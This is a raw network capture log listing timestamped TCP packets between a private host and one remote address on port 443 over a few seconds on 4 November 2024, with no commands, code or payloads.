Nov 4, 2024 17:31:37.979414940 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.980597019 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.980669022 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.980726957 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.980803967 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.980825901 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.980839014 CET	49787	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.980844021 CET	443	49787	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.983032942 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.983068943 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:37.983150005 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.983282089 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:37.983294964 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.053242922 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.053782940 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.053803921 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.054281950 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.054289103 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.185662031 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.185795069 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.185844898 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.185976982 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.185993910 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.186003923 CET	49789	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.186009884 CET	443	49789	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.188616037 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.188657045 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.188736916 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.188874006 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.188885927 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.446125984 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.446641922 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.446666002 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.447137117 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.447145939 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.658272982 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.658488035 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.658570051 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.658674955 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.658701897 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.658716917 CET	49733	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.658726931 CET	443	49733	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.661561966 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.661581039 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.661658049 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.661895990 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.661907911 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.743477106 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.744183064 CET	49790	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.744203091 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.744683027 CET	49790	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.744689941 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.873083115 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.873389959 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.873464108 CET	49790	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.873511076 CET	49790	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.873527050 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.873537064 CET	49790	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.873543024 CET	443	49790	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.876641035 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.876682043 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.876785040 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.876954079 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.876965046 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.889209986 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.889708042 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.889724970 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.890175104 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.890180111 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.930049896 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.930805922 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.930818081 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:38.931392908 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:38.931397915 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.020576000 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.020689964 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.020752907 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.020903111 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.020920038 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.020929098 CET	49791	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.020936012 CET	443	49791	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.024200916 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.024247885 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.024350882 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.024677038 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.024688959 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.062374115 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.062544107 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.062606096 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.062839031 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.062860966 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.062874079 CET	49792	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.062880993 CET	443	49792	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.066015005 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.066066980 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.066143990 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.066276073 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.066286087 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.393068075 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.393724918 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.393735886 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.394223928 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.394228935 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.524476051 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.524576902 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.524653912 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.524904966 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.524912119 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.524923086 CET	49793	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.524929047 CET	443	49793	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.527991056 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.528028011 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.528146029 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.528321028 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.528350115 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.606882095 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.607718945 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.607744932 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.607871056 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.607878923 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.734623909 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.734802008 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.734886885 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.735104084 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.735126019 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.735146999 CET	49794	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.735152960 CET	443	49794	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.737757921 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.737795115 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.737885952 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.738148928 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.738166094 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.765158892 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.765862942 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.765872955 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.766338110 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.766344070 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.808653116 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.809277058 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.809297085 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.809691906 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.809698105 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.897376060 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.897903919 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.898000956 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.898055077 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.898072958 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.898118019 CET	49795	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.898123980 CET	443	49795	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.903112888 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.903151989 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.903207064 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.903526068 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.903551102 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.941605091 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.941862106 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.941932917 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.941982031 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.941982031 CET	49796	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.942003012 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.942013025 CET	443	49796	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.947132111 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.947180033 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:39.947252989 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.947546005 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:39.947562933 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.271034956 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.275733948 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.275764942 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.276196957 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.276206970 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.410339117 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.410418034 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.410516977 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.419958115 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.419976950 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.420015097 CET	49797	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.420022011 CET	443	49797	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.453033924 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.453067064 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.453165054 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.453409910 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.453423977 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.511627913 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.513946056 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.513972998 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.514539957 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.514549971 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.659198999 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.661509991 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.661531925 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.664289951 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.664304018 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.677608967 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.677752972 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.677819014 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.680773020 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.681235075 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.681235075 CET	49798	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.681267023 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.681281090 CET	443	49798	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.681744099 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.681759119 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.689058065 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.689065933 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.726375103 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.726433039 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.726507902 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.726691008 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.726701975 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.798830032 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.798902035 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.798959970 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.799170017 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.799190998 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.799197912 CET	49799	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.799205065 CET	443	49799	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.801821947 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.801860094 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.801949024 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.802090883 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.802103043 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.815567970 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.815594912 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.815654993 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.815685034 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.815709114 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.815829039 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.815845966 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.815859079 CET	49800	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.815865993 CET	443	49800	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.818417072 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.818454981 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:40.818558931 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.818675995 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:40.818691015 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.235476017 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.236437082 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.236449957 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.236906052 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.236912012 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.368139029 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.368201017 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.368381977 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.368808985 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.368830919 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.368844986 CET	49801	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.368854046 CET	443	49801	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.371850014 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.371886015 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.371980906 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.372164011 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.372174978 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.453145981 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.453788996 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.453804970 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.454298019 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.454303026 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.545523882 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.546164036 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.546180964 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.546646118 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.546653032 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.557482958 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.557890892 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.557913065 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.558262110 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.558268070 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.602036953 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.602118015 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.602195024 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.602399111 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.602399111 CET	49802	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.602415085 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.602421999 CET	443	49802	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.605166912 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.605211020 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.605320930 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.605436087 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.605446100 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.674290895 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.674316883 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.674379110 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.674384117 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.674484968 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.674638987 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.674663067 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.674674988 CET	49803	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.674683094 CET	443	49803	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.677546024 CET	49807	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.677592993 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.677674055 CET	49807	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.677822113 CET	49807	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.677834988 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.779206038 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.779225111 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.779335976 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.779356003 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.779428005 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.779434919 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.779470921 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.779535055 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.779683113 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.779683113 CET	49804	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.779702902 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.779706955 CET	443	49804	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.782363892 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.782392025 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:41.782468081 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.782597065 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:41.782613993 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.096616983 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.097662926 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.097676992 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.098155022 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.098160028 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.228168964 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.228198051 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.228240967 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.228255033 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.228266954 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.228326082 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.228576899 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.228593111 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.228604078 CET	49805	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.228610039 CET	443	49805	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.231236935 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.231281042 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.231368065 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.231529951 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.231554031 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.339190960 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.339900970 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.339917898 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.340346098 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.340351105 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.426129103 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.426661968 CET	49807	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.426692009 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.427138090 CET	49807	443	192.168.2.5	13.107.246.45
